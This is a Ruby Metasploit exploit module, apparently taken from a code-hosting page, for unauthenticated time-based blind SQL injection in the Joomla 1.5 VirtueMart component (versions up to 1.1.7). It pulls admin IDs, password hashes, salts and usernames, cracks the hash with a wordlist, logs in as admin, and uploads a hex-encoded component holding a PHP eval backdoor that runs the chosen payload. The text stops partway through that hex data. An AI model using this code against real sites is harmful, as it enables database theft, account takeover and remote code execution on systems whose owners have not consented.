1118 lines
No EOL
29 KiB
Ruby
Executable file
1118 lines
No EOL
29 KiB
Ruby
Executable file
# Exploit Title: Joomla 1.5 com_virtuemart <= 1.1.7 blind time-based sql injection MSF module
|
|
# Date: Thu Jul 28, 2011
|
|
# Author: TecR0c - tecr0c.mythsec [@] gmail.com
|
|
# Version: <= 1.1.7
|
|
# Download: http://dev.virtuemart.net/projects/virtuemart/files
|
|
# Greetz: mythsec team, James Bercega for code base for sqli blind
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Joomla 1.5 VirtueMart Component <= 1.1.7 Blind SQL Injection',
|
|
'Description' => %q{
|
|
A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifies
|
|
unauthenticated time-based blind SQL injection in the "page" variable of the
|
|
virtuemart component. This vulnerability allows an attacker to gain information
|
|
from the database with specially crafted URLs taking advantage of the MySQL
|
|
benchmark. This issue was patched in version 1.1.7a.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'TecR0c', #Initial discovery, msf module
|
|
'mr_me', #Initial discovery with TecR0c
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'http://www.exploit-db.com/exploits/17132/' ],
|
|
[ 'URL','http://www.stratsec.net/Research/Advisories/' ],
|
|
],
|
|
'Privileged' => false,
|
|
'Platform' => 'php',
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' => [[ 'Automatic', { }]],
|
|
'DisclosureDate' => 'Feb 11 2011',
|
|
'DefaultTarget' => 0 ))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('JDIR', [true, 'Joomla directory', '/']),
|
|
OptInt.new('BMCT', [true, 'Benchmark Counter', 50000000 ]),
|
|
OptInt.new('BMDF', [true, 'Benchmark Difference', 3 ]),
|
|
OptInt.new('BMRC', [true, 'Benchmark Request Count', 1 ]),
|
|
OptString.new('WLIST', [true,
|
|
'Wordlist location',
|
|
'/home/foo/bar.txt'
|
|
]),
|
|
OptString.new('AGNT', [false, 'User Agent Info', 'Mozilla/5.0' ]),
|
|
OptString.new('PREF', [false, 'Database prefixt', 'jos_' ]),
|
|
OptString.new('JQRY', [false,
|
|
'URI to trigger bug',
|
|
'index.php?option=com_virtuemart&page=1'
|
|
])
|
|
], self.class)
|
|
end
|
|
#################################################
|
|
# Extract "Set-Cookie"
|
|
def init_cookie(data, cstr = true)
|
|
|
|
# Raw request? Or cookie data specifically?
|
|
data = data.headers['Set-Cookie'] ? data.headers['Set-Cookie']: data
|
|
|
|
# Beginning
|
|
if ( data )
|
|
|
|
# Break them apart
|
|
data = data.split(', ')
|
|
|
|
# Initialize
|
|
ctmp = ''
|
|
tmps = {}
|
|
|
|
# Parse cookies
|
|
data.each do | x |
|
|
|
|
# Remove extra data
|
|
x = x.split(';')[0]
|
|
|
|
# Seperate cookie pairs
|
|
if ( x =~ /([^;\s]+)=([^;\s]+)/im )
|
|
|
|
# Key
|
|
k = $1
|
|
|
|
# Val
|
|
v = $2
|
|
|
|
# Valid cookie value?
|
|
if ( v.length() > 0 )
|
|
|
|
# Build cookie hash
|
|
tmps[k] = v
|
|
|
|
# Report cookie status
|
|
print_status("Got Cookie: #{k} => #{v}");
|
|
end
|
|
end
|
|
end
|
|
|
|
# Build string data
|
|
if ( cstr == true )
|
|
|
|
# Loop
|
|
tmps.each do |x,y|
|
|
|
|
# Cookie key/value
|
|
ctmp << "#{x}=#{y};"
|
|
end
|
|
|
|
# Assign
|
|
tmps['cstr'] = ctmp
|
|
end
|
|
|
|
# Return
|
|
return tmps
|
|
else
|
|
# Something may be wrong
|
|
init_debug("No cookies within the given response")
|
|
end
|
|
end
|
|
|
|
#################################################
|
|
|
|
# Simple debugging output
|
|
def init_debug(resp, exit = 0)
|
|
|
|
# Continue execution
|
|
if ( exit.to_i > 0 )
|
|
|
|
# Exit
|
|
exit(0)
|
|
end
|
|
|
|
end
|
|
|
|
#################################################
|
|
|
|
# Generic post wrapper
|
|
def http_post(url, data, headers = {}, timeout = 15)
|
|
|
|
# Protocol
|
|
proto = datastore['SSL'] ? 'https': 'http'
|
|
|
|
# Determine request url
|
|
url = url.length ? url: ''
|
|
|
|
# Determine User-Agent
|
|
headers['User-Agent'] = headers['User-Agent'] ?
|
|
headers['User-Agent'] : datastore['AGNT']
|
|
|
|
# Determine Content-Type
|
|
headers['Content-Type'] = headers['Content-Type'] ?
|
|
headers['Content-Type'] : "application/x-www-form-urlencoded"
|
|
|
|
# Determine Content-Length
|
|
headers['Content-Length'] = data.length
|
|
|
|
# Determine Referer
|
|
headers['Referer'] = headers['Referer'] ?
|
|
headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"
|
|
|
|
# Delete all the null headers
|
|
headers.each do | hkey, hval |
|
|
|
|
# Null value
|
|
if ( !hval )
|
|
|
|
# Delete header key
|
|
headers.delete(hkey)
|
|
end
|
|
end
|
|
|
|
# Send request
|
|
resp = send_request_raw(
|
|
{
|
|
'uri' => datastore['JDIR'] + url,
|
|
'method' => 'POST',
|
|
'data' => data,
|
|
'headers' => headers
|
|
},
|
|
timeout )
|
|
|
|
|
|
# Returned
|
|
return resp
|
|
|
|
end
|
|
|
|
#################################################
|
|
|
|
# Generic post multipart wrapper
|
|
def http_post_multipart(url, data, headers = {}, timeout = 15)
|
|
|
|
# Boundary string
|
|
bndr = Rex::Text.rand_text_alphanumeric(8)
|
|
|
|
# Protocol
|
|
proto = datastore['SSL'] ? 'https': 'http'
|
|
|
|
# Determine request url
|
|
url = url.length ? url: ''
|
|
|
|
# Determine User-Agent
|
|
headers['User-Agent'] = headers['User-Agent'] ?
|
|
headers['User-Agent'] : datastore['AGNT']
|
|
|
|
# Determine Content-Type
|
|
headers['Content-Type'] = headers['Content-Type'] ?
|
|
headers['Content-Type'] : "multipart/form-data; boundary=#{bndr}"
|
|
|
|
# Determine Referer
|
|
headers['Referer'] = headers['Referer'] ?
|
|
headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"
|
|
|
|
# Delete all the null headers
|
|
headers.each do | hkey, hval |
|
|
|
|
# Null value
|
|
if ( !hval )
|
|
|
|
# Delete header key
|
|
headers.delete(hkey)
|
|
end
|
|
end
|
|
|
|
# Init
|
|
temp = ''
|
|
|
|
# Parse form values
|
|
data.each do |name, value|
|
|
|
|
# Hash means file data
|
|
if ( value.is_a?(Hash) )
|
|
|
|
# Validate form fields
|
|
filename = value['filename'] ? value['filename']:
|
|
init_debug("Filename value missing from #{name}", 1)
|
|
contents = value['contents'] ? value['contents']:
|
|
init_debug("Contents value missing from #{name}", 1)
|
|
mimetype = value['mimetype'] ? value['mimetype']:
|
|
init_debug("Mimetype value missing from #{name}", 1)
|
|
encoding = value['encoding'] ? value['encoding']: "Binary"
|
|
|
|
# Build multipart data
|
|
temp << "--#{bndr}\r\n"
|
|
temp << "Content-Disposition: form-data; name=\"#{name}\"
|
|
; filename=\"#{filename}\"\r\n"
|
|
temp << "Content-Type: #{mimetype}\r\n"
|
|
temp << "Content-Transfer-Encoding: #{encoding}\r\n"
|
|
temp << "\r\n"
|
|
temp << "#{contents}\r\n"
|
|
|
|
else
|
|
# Build multipart data
|
|
temp << "--#{bndr}\r\n"
|
|
temp << "Content-Disposition: form-data; name=\"#{name}\";\r\n"
|
|
temp << "\r\n"
|
|
temp << "#{value}\r\n"
|
|
end
|
|
end
|
|
|
|
# Complete the form data
|
|
temp << "--#{bndr}--\r\n"
|
|
|
|
# Assigned
|
|
data = temp
|
|
|
|
# Determine Content-Length
|
|
headers['Content-Length'] = data.length
|
|
|
|
# Send request
|
|
resp = send_request_raw(
|
|
{
|
|
'uri' => datastore['JDIR'] + url,
|
|
'method' => 'POST',
|
|
'data' => data,
|
|
'headers' => headers
|
|
},
|
|
timeout)
|
|
|
|
# Returned
|
|
return resp
|
|
|
|
end
|
|
|
|
#################################################
|
|
|
|
# Generic get wrapper
|
|
def http_get(url, headers = {}, timeout = 15)
|
|
|
|
# Protocol
|
|
proto = datastore['SSL'] ? 'https': 'http'
|
|
|
|
# Determine request url
|
|
url = url.length ? url: ''
|
|
|
|
# Determine User-Agent
|
|
headers['User-Agent'] = headers['User-Agent'] ?
|
|
headers['User-Agent'] : datastore['AGNT']
|
|
|
|
# Determine Referer
|
|
headers['Referer'] = headers['Referer'] ?
|
|
headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"
|
|
|
|
# Delete all the null headers
|
|
headers.each do | hkey, hval |
|
|
|
|
# Null value // Also, remove post specific data, due to a bug ...
|
|
if ( !hval || hkey == "Content-Type" || hkey == "Content-Length" )
|
|
|
|
# Delete header key
|
|
headers.delete(hkey)
|
|
end
|
|
end
|
|
|
|
|
|
# Send request
|
|
resp = send_request_raw({
|
|
'uri' => datastore['JDIR'] + url,
|
|
'headers' => headers,
|
|
'method' => 'GET',
|
|
}, timeout)
|
|
|
|
# Returned
|
|
return resp
|
|
|
|
end
|
|
|
|
#################################################
|
|
|
|
|
|
# Used to perform benchmark querys
|
|
def sql_benchmark(test, hdrs, table = nil, where = '1+LIMIT+1', tnum = nil )
|
|
|
|
# Init
|
|
wait = 0
|
|
|
|
# Defaults
|
|
table = table ? table: 'users'
|
|
|
|
# SQL Injection string used to trigger the MySQL BECNHMARK() function
|
|
sqli = ("'+UNION+SELECT+IF(#{test},+BENCHMARK(#{datastore['BMCT']},\
|
|
+MD5(1)),+0)+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}--+sqli.page")
|
|
|
|
# Number of tests to run. We run this
|
|
# amount of tests and then look for a
|
|
# median value that is greater than
|
|
# the benchmark difference.
|
|
tnum = tnum ? tnum: datastore['BMRC']
|
|
|
|
# Run the tests
|
|
tnum.to_i.times do | i |
|
|
|
|
# Start time
|
|
bmc1 = Time.now.to_i
|
|
|
|
# Make the request
|
|
|
|
|
|
init_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))
|
|
# End time
|
|
bmc2 = Time.now.to_i
|
|
|
|
|
|
# Total time
|
|
wait += bmc2 - bmc1
|
|
end
|
|
|
|
# Return the results
|
|
return ( wait.to_i / tnum.to_i )
|
|
|
|
end
|
|
|
|
|
|
#################################################
|
|
|
|
|
|
# Used to perform benchmark querys
|
|
def sql_benchmark_2(hdrs, columns = nil, table = nil, where = '1+LIMIT+1', tnum = nil )
|
|
|
|
# Init
|
|
wait = 0
|
|
|
|
# Defaults
|
|
table = table ? table: 'users'
|
|
|
|
# SQL Injection string used to trigger the MySQL BECNHMARK() function
|
|
sqli = (
|
|
"'+UNION+SELECT+IF(substring((select+#{columns}+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}),1,1),BENCHMARK(#{datastore['BMCT']},+MD5(1)),+0)--+sqli.page")
|
|
|
|
# Number of tests to run. We run this
|
|
# amount of tests and then look for a
|
|
# median value that is greater than
|
|
# the benchmark difference.
|
|
tnum = tnum ? tnum: datastore['BMRC']
|
|
|
|
# Run the tests
|
|
tnum.to_i.times do | i |
|
|
|
|
# Start time
|
|
bmc1 = Time.now.to_i
|
|
|
|
# Make the request
|
|
|
|
|
|
init_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))
|
|
# End time
|
|
bmc2 = Time.now.to_i
|
|
|
|
|
|
# Total time
|
|
wait += bmc2 - bmc1
|
|
end
|
|
|
|
# Return the results
|
|
return ( wait.to_i / tnum.to_i )
|
|
|
|
end
|
|
|
|
|
|
#################################################
|
|
|
|
|
|
def get_password(hash, salt, opts = nil)
|
|
|
|
# Wordlist
|
|
wlst = datastore['WLIST']
|
|
|
|
# Init
|
|
cntr = 0
|
|
|
|
# Verbose
|
|
print_status("Attempting to crack admin password hash")
|
|
|
|
# Valid hash length only
|
|
if ( hash.length != 32 )
|
|
|
|
# Failure
|
|
print_error("Invalid Joomla MD5 hash: #{hash.to_s}")
|
|
return nil
|
|
end
|
|
|
|
# Does the wordlist exist?
|
|
if ( !File.exist?(wlst) )
|
|
|
|
# Failure
|
|
print_error("Unable to load wordlist: #{wlst}")
|
|
return nil
|
|
else
|
|
|
|
# Load the wordlist file
|
|
list = File.readlines(wlst)
|
|
end
|
|
|
|
# Verbose
|
|
print_status("Loaded #{list.count.to_s} words from the specified list")
|
|
print_status("This may take quite some time ...")
|
|
|
|
# Start time
|
|
bmc1 = Time.now.to_i
|
|
|
|
# Loop through list
|
|
list.each do | word |
|
|
|
|
# Cleanup
|
|
word = word.strip
|
|
|
|
# Counter
|
|
cntr = cntr + 1
|
|
|
|
# Attempt to find the plaintext password
|
|
if ( hash == Rex::Text.md5(word + salt) )
|
|
|
|
# Success!
|
|
print_status("Successfully cracked the following hash")
|
|
print_status("#{hash} => #{salt} == #{word}")
|
|
|
|
# Ended time
|
|
bmc2 = Time.now.to_i
|
|
|
|
# Duration
|
|
bmc3 = bmc2 - bmc1
|
|
bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes"
|
|
|
|
# Verbose
|
|
print_status("Operation completed in #{bmc3}")
|
|
|
|
# Return
|
|
return word
|
|
end # if
|
|
end # each
|
|
|
|
# Failure
|
|
print_error("Unable to crack the following hash")
|
|
print_error("#{hash} => #{salt} == ???")
|
|
|
|
# Ended time
|
|
bmc2 = Time.now.to_i
|
|
|
|
# Duration
|
|
bmc3 = bmc2 - bmc1
|
|
bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes"
|
|
|
|
# Verbose
|
|
print_status("Operation completed in #{bmc3}")
|
|
|
|
# Return
|
|
return nil
|
|
end
|
|
|
|
#################################################
|
|
|
|
def get_users_data(hdrs, snum, slim, cset, sqlf, sqlw)
|
|
|
|
# Start time
|
|
tot1 = Time.now.to_i
|
|
|
|
# Initialize
|
|
reqc = 0
|
|
retn = String.new
|
|
|
|
# Extract salt
|
|
for i in snum..slim
|
|
|
|
# Offset position
|
|
oset = ( i - snum ) + 1
|
|
|
|
# Loop charset
|
|
for cbit in cset
|
|
|
|
# Test character
|
|
cbit.each do | cchr |
|
|
|
|
# Start time (overall)
|
|
bmc1 = Time.now.to_i
|
|
|
|
# Benchmark query
|
|
bmcv = sql_benchmark("SUBSTRING(#{sqlf},#{i},1)+LIKE+BINARY+CHAR(#{cchr.ord})",
|
|
hdrs,"users", sqlw, datastore['BMRC'])
|
|
|
|
# Noticable delay? We must have a match! ;)
|
|
if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )
|
|
|
|
# Verbose
|
|
print_status(sprintf("Character %02s is %s", oset.to_s, cchr ))
|
|
|
|
# Append chr
|
|
retn << cchr
|
|
|
|
# Exit loop
|
|
break
|
|
end
|
|
|
|
# Counter
|
|
reqc += 1
|
|
|
|
end # each
|
|
end # for
|
|
|
|
# Host not vulnerable?
|
|
if ( oset != retn.length )
|
|
|
|
# Failure
|
|
print_error("Unable to extract character ##{oset.to_s}\
|
|
. Extraction failed!")
|
|
return nil
|
|
end
|
|
end # for
|
|
|
|
# End time (total)
|
|
tot2 = Time.now.to_i
|
|
|
|
# Benchmark totals
|
|
tot3 = tot2 - tot1
|
|
|
|
# Verbose
|
|
print_status("Found data: #{retn}")
|
|
print_status("Operation required #{reqc.to_s} requests (#{( tot3 / 60).to_s} minutes)")
|
|
|
|
# Return
|
|
return retn
|
|
end
|
|
|
|
#################################################
|
|
|
|
def check
|
|
|
|
print_status("Attempting to determine virtuemart version")
|
|
|
|
resp = http_get("modules/mod_virtuemart_currencies/mod_virtuemart_currencies.xml")
|
|
|
|
# Extract Joomla version information
|
|
if ( resp.body =~ /<version>([^\s]+)<\/version>/ )
|
|
|
|
# Version
|
|
vers = $1.strip
|
|
|
|
# Version "parts"
|
|
ver1, ver2, ver3 = vers.split(/\./)
|
|
|
|
# Only if version 1.1.7
|
|
if ( ver3.to_i >= 7)
|
|
|
|
# Exploit failed
|
|
init_debug(resp)
|
|
print_status("Please confirm manually")
|
|
return Exploit::CheckCode::Safe
|
|
else
|
|
|
|
print_status("The target is running VirtueMart : #{vers}")
|
|
return Exploit::CheckCode::Vulnerable
|
|
end
|
|
else
|
|
|
|
# Verbose
|
|
print_error("Unable to determine Joomla version ...")
|
|
end
|
|
|
|
end
|
|
|
|
#################################################
|
|
def exploit
|
|
|
|
# Numeric test string
|
|
tstr = Time.now.to_i.to_s
|
|
|
|
# MD5 test string
|
|
tmd5 = Rex::Text.md5(tstr)
|
|
|
|
# Encoded payload
|
|
load = payload.encoded
|
|
|
|
#################################################
|
|
# STEP 02 // Get the cookie for virtuemart :)
|
|
#################################################
|
|
|
|
# request to get virtuemart cookie
|
|
resp = http_get("index.php?option=com_virtuemart&page=1")
|
|
|
|
# Init cookie
|
|
cook = init_cookie(resp)
|
|
|
|
# Build headers for authenticated session
|
|
hdrs = { "Cookie" => cook['cstr'] }
|
|
|
|
#################################################
|
|
# STEP 03 // Calculate BENCHMARK() response times
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Calculating target response times")
|
|
print_status("Benchmarking #{datastore['BMRC']} normal requests")
|
|
|
|
|
|
# Normal request median (globally accessible)
|
|
datastore['BMC0'] = sql_benchmark("1=2", hdrs)
|
|
|
|
# Verbose
|
|
print_status("Normal request avg: #{datastore['BMC0'].to_s} seconds")
|
|
print_status("Benchmarking #{datastore['BMRC']} delayed requests")
|
|
|
|
# Delayed request median
|
|
bmc1 = sql_benchmark("1=1", hdrs)
|
|
|
|
# Verbose
|
|
print_status("Delayed request avg: #{bmc1.to_s} seconds")
|
|
|
|
# Benchmark totals
|
|
bmct = bmc1 - datastore['BMC0']
|
|
|
|
# Delay too small. The host may not be
|
|
# vulnerable. Try increasing the BMCT.
|
|
if ( bmct.to_i < datastore['BMDF'].to_i )
|
|
|
|
# Verbose
|
|
print_error("your benchmark threshold is small, or host is not vulnerable")
|
|
print_error("increase the benchmark threshold adjust the value of the BMDF")
|
|
print_error("increase the expression iterator adjust the value of the BMCT")
|
|
return
|
|
else
|
|
# Host appears exploitable
|
|
print_status("Request Difference: #{bmct.to_s} seconds")
|
|
end
|
|
|
|
#################################################
|
|
# STEP 04 // Attempting to find a valid admin id
|
|
#################################################
|
|
|
|
atot = 0 # Total admins
|
|
scnt = 0 # Step counter
|
|
step = 10 # Step increment
|
|
slim = 10000 # Step limit
|
|
|
|
# 42 is the hard coded base uid within Joomla ...
|
|
# ... and the answer to the ultimate question! ;]
|
|
snum = ( !defined?(auid) ) ? 62: auid # changed from 42 to 62
|
|
|
|
# Verbose
|
|
print_status("Calculating total number of administrators")
|
|
|
|
# Check how many admin accounts are in the database
|
|
for i in 0..slim do
|
|
|
|
# Benchmark
|
|
bmcv = sql_benchmark_2(hdrs, "gid", "users", "gid=25+LIMIT+#{i.to_s},1",datastore['BMRC'])
|
|
|
|
# If we do not have a delay, then we have reached the end ...
|
|
if ( !( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) )
|
|
|
|
# Range
|
|
atot = i
|
|
|
|
# Verbose
|
|
print_status("Successfully confirmed #{atot.to_s} admin accounts")
|
|
|
|
# Exit loop
|
|
break
|
|
end
|
|
end
|
|
|
|
# Loops until limit
|
|
while ( snum < slim && scnt < atot )
|
|
|
|
# Verbose
|
|
print_status("Attempting to find a valid admin ID")
|
|
|
|
# Verbose
|
|
print_status("Stepping from #{snum.to_s} to #{slim.to_s} by #{step.to_s}")
|
|
|
|
for i in snum.step(slim, step)
|
|
bmcv = 0
|
|
|
|
|
|
# Benchmark
|
|
bmcv = sql_benchmark("#{i}+>+id", hdrs, "users","gid=25+LIMIT+#{scnt.to_s},1", datastore['BMRC'])
|
|
|
|
# Noticable delay? We must have a match! ;)
|
|
if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )
|
|
|
|
# Range
|
|
itmp = i
|
|
|
|
# Exit loop
|
|
break
|
|
else
|
|
|
|
# Out of time ..
|
|
if ( i == slim )
|
|
|
|
# Failure
|
|
print_error("Unable to find a valid user id. Exploit failed!")
|
|
return
|
|
end
|
|
|
|
end
|
|
end
|
|
|
|
# Jump back by #{step} and increment by one
|
|
for i in ( snum ).upto(( itmp ))
|
|
bmcv = 0
|
|
auid = 0
|
|
|
|
|
|
# Benchmark
|
|
bmcv = sql_benchmark("id+=+#{i}", hdrs, "users", "gid=25",
|
|
datastore['BMRC'])
|
|
|
|
# Noticable delay? We must have a match! ;)
|
|
if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )
|
|
|
|
# UserID - first time auid gets set to 62
|
|
auid = i
|
|
|
|
# Verbose
|
|
print_status("Found a valid admin account uid : #{auid.to_s}")
|
|
|
|
# Step Counter
|
|
scnt += 1
|
|
|
|
# Exit loop
|
|
break
|
|
else
|
|
|
|
# Out of time ..
|
|
if ( i == ( itmp + step ) )
|
|
|
|
# Failure
|
|
print_error("Unable to find a valid user id. Exploit failed!")
|
|
return
|
|
end
|
|
end
|
|
end
|
|
|
|
#################################################
|
|
# These are the charsets used for the enumeration
|
|
# operations and can be easily expanded if needed
|
|
#################################################
|
|
|
|
# Hash charset a-f0-9
|
|
hdic = [ ('a'..'f'), ('0'..'9') ]
|
|
|
|
# Salt charset a-zA-Z0-9
|
|
sdic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]
|
|
|
|
# Username charset
|
|
udic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]
|
|
|
|
#################################################
|
|
# STEP 05 // Attempt to extract admin pass hash
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Attempting to gather admin password hash")
|
|
|
|
# Get pass hash - changed bs
|
|
if ( auid != 0 && !( hash = get_users_data(
|
|
hdrs, # Pass cookie value
|
|
1, # Length Start
|
|
32, # Length Maximum
|
|
hdic, # Charset Array
|
|
"password", # SQL Field name
|
|
"id=#{auid.to_s}" # SQL Where data
|
|
) ) )
|
|
|
|
# Failure
|
|
print_error("Unable to gather admin pass hash. Exploit failed!!")
|
|
return
|
|
end
|
|
#################################################
|
|
# STEP 06 // Attempt to extract admin pass salt
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Attempting to gather admin password salt")
|
|
|
|
# Get pass salt - changed bs
|
|
if ( auid != 0 && !( salt = get_users_data(
|
|
hdrs, # Pass cookie value
|
|
34, # Length Start
|
|
65, # Length Maximum
|
|
sdic, # Charset Array
|
|
"password", # SQL Field name
|
|
"id=#{auid.to_s}" # SQL Where data
|
|
) ) )
|
|
|
|
# Failure
|
|
print_error("Unable to gather admin pass salt. Exploit failed!!")
|
|
return
|
|
end
|
|
|
|
#################################################
|
|
# STEP 07 // Attempt to crack the extracted hash
|
|
#################################################
|
|
|
|
# Attempt to crack password hash - changed bs
|
|
if ( auid != 0 )
|
|
pass = get_password(hash, salt)
|
|
end
|
|
|
|
# Got pass? - changed bs
|
|
if ( auid != 0 && pass )
|
|
|
|
#################################################
|
|
# STEP 08 // Attempt to extract admin username
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Attempting to determine target username length")
|
|
|
|
# Hard limit is 150
|
|
for i in 1.upto(150)
|
|
|
|
# Benchmark
|
|
bmcv = sql_benchmark("LENGTH(username)=#{i.to_s}", hdrs,
|
|
"users", "id=#{auid.to_s}", datastore['BMRC'])
|
|
|
|
# Noticable delay? We must have a match! ;)
|
|
if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )
|
|
|
|
# Length
|
|
ulen = i
|
|
|
|
# Verbose
|
|
print_status("The username is #{i.to_s} characters long")
|
|
|
|
# Exit loop
|
|
break
|
|
end
|
|
end
|
|
|
|
# Verbose
|
|
print_status('Gathering admin username')
|
|
|
|
# Get pass salt
|
|
if ( !( user = get_users_data(
|
|
hdrs, # Pass cookie value
|
|
1, # Length Start
|
|
ulen, # Length Maximum
|
|
udic, # Charset Array
|
|
"username", # SQL Field name
|
|
"id=#{auid.to_s}" # SQL Where data
|
|
) ) )
|
|
|
|
# Failure
|
|
print_error("Unable to gather admin user name. Exploit failed!!")
|
|
return
|
|
end
|
|
|
|
# Verbose
|
|
print_status("Attempting to extract a valid request token")
|
|
|
|
# Request a valid token
|
|
resp = http_get("administrator/index.php")
|
|
|
|
# Extract token
|
|
if ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )
|
|
|
|
# Token
|
|
rtok = $1
|
|
|
|
# Verbose
|
|
print_status("Got token: #{rtok}")
|
|
else
|
|
|
|
# Failure
|
|
print_error("Unable to extract request token. Exploit failed!")
|
|
init_debug(resp)
|
|
return
|
|
end
|
|
|
|
# Init cookie
|
|
cook = init_cookie(resp)
|
|
|
|
# Build headers for authenticated session
|
|
hdrs = { "Cookie" => cook['cstr'] }
|
|
|
|
#################################################
|
|
# STEP 09 // Attempt to authenticate as the admin
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Attempting to login as: #{user}")
|
|
|
|
# Post data for login request
|
|
post = "username=#{user}&passwd=#{pass}\
|
|
〈=&option=com_login&task=login&#{rtok}=1"
|
|
|
|
# Login request
|
|
resp = http_post("administrator/index.php", post, hdrs)
|
|
|
|
# Authentication successful???
|
|
if ( resp && resp.code == 303 )
|
|
|
|
# Success
|
|
print_status("Successfully logged in as: #{user}")
|
|
else
|
|
|
|
# Failure
|
|
print_error("Unable to authenticate. Exploit failed!")
|
|
init_debug(resp)
|
|
return
|
|
end
|
|
|
|
#################################################
|
|
# STEP 10 // Upload wrapper and execute payload!
|
|
#################################################
|
|
|
|
# Verbose
|
|
print_status("Attempting to extract refreshed request token")
|
|
|
|
# Request a valid token (again)
|
|
resp = http_get("administrator/index.php?option=com_installer",hdrs)
|
|
|
|
# Extract token
|
|
if ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )
|
|
|
|
# Token
|
|
rtok = $1
|
|
|
|
# Verbose
|
|
print_status("Got token: #{rtok}")
|
|
else
|
|
|
|
# Failure
|
|
print_error("Unable to extract request token. Exploit failed!")
|
|
init_debug(resp.body)
|
|
return
|
|
end
|
|
|
|
# Component specific data
|
|
cstr = "joomla"
|
|
czip = "com_#{cstr}.zip"
|
|
curi = "components/com_#{cstr}/#{cstr}.php"
|
|
|
|
#################################################
|
|
# Our Joomla specific PHP payload wrapper that is
|
|
# used to have more flexibility when delivering a
|
|
# selected payload to a target. The wrapper is in
|
|
# the Joomla! 1.6 compononent format and can also
|
|
# be used with other Joomla exploits.
|
|
#################################################
|
|
#
|
|
# Type: Joomla 1.6 Component
|
|
# File: com_joomla/joomla.xml <-- installer file
|
|
# com_joomla/joomla.php <-- component file
|
|
#
|
|
# Data: <?php
|
|
# # Modify settings
|
|
# error_reporting(0);
|
|
# ini_set('max_execution_time', 0);
|
|
#
|
|
# # Execute the selected payload, and delete the wrapper
|
|
# @eval(base64_decode(file_get_contents('php://input')));
|
|
# ?>
|
|
#################################################
|
|
|
|
# Hex encoded component zip data
|
|
wrap = "\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\x65\xB3\x9A\x3E\x00\x00"
|
|
wrap << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x63\x6F"
|
|
wrap << "\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B\x03\x04\x0A\x00\x00"
|
|
wrap << "\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03\xF2\xF9\xAF\x00\x00\x00\xAF"
|
|
wrap << "\x00\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C"
|
|
wrap << "\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68\x70\x3C\x3F\x70\x68"
|
|
wrap << "\x70\x0D\x0A\x23\x20\x4D\x6F\x64\x69\x66\x79\x20\x73\x65\x74\x74"
|
|
wrap << "\x69\x6E\x67\x73\x0D\x0A\x65\x72\x72\x6F\x72\x5F\x72\x65\x70\x6F"
|
|
wrap << "\x72\x74\x69\x6E\x67\x28\x30\x29\x3B\x0D\x0A\x69\x6E\x69\x5F\x73"
|
|
wrap << "\x65\x74\x28\x27\x6D\x61\x78\x5F\x65\x78\x65\x63\x75\x74\x69\x6F"
|
|
wrap << "\x6E\x5F\x74\x69\x6D\x65\x27\x2C\x20\x30\x29\x3B\x0D\x0A\x0D\x0A"
|
|
wrap << "\x23\x20\x45\x78\x65\x63\x75\x74\x65\x20\x74\x68\x65\x20\x73\x65"
|
|
wrap << "\x6C\x65\x63\x74\x65\x64\x20\x70\x61\x79\x6C\x6F\x61\x64\x0D\x0A"
|
|
wrap << "\x40\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63"
|
|
wrap << "\x6F\x64\x65\x28\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E"
|
|
wrap << "\x74\x65\x6E\x74\x73\x28\x27\x70\x68\x70\x3A\x2F\x2F\x69\x6E\x70"
|
|
wrap << "\x75\x74\x27\x29\x29\x29\x3B\x0D\x0A\x3F\x3E\x50\x4B\x03\x04\x0A"
|
|
wrap << "\x00\x00\x00\x00\x00\x91\xB6\x9A\x3E\x8D\x4A\x99\xA9\x07\x01\x00"
|
|
wrap << "\x00\x07\x01\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F"
|
|
wrap << "\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x78\x6D\x6C\x3C\x3F"
|
|
wrap << "\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30"
|
|
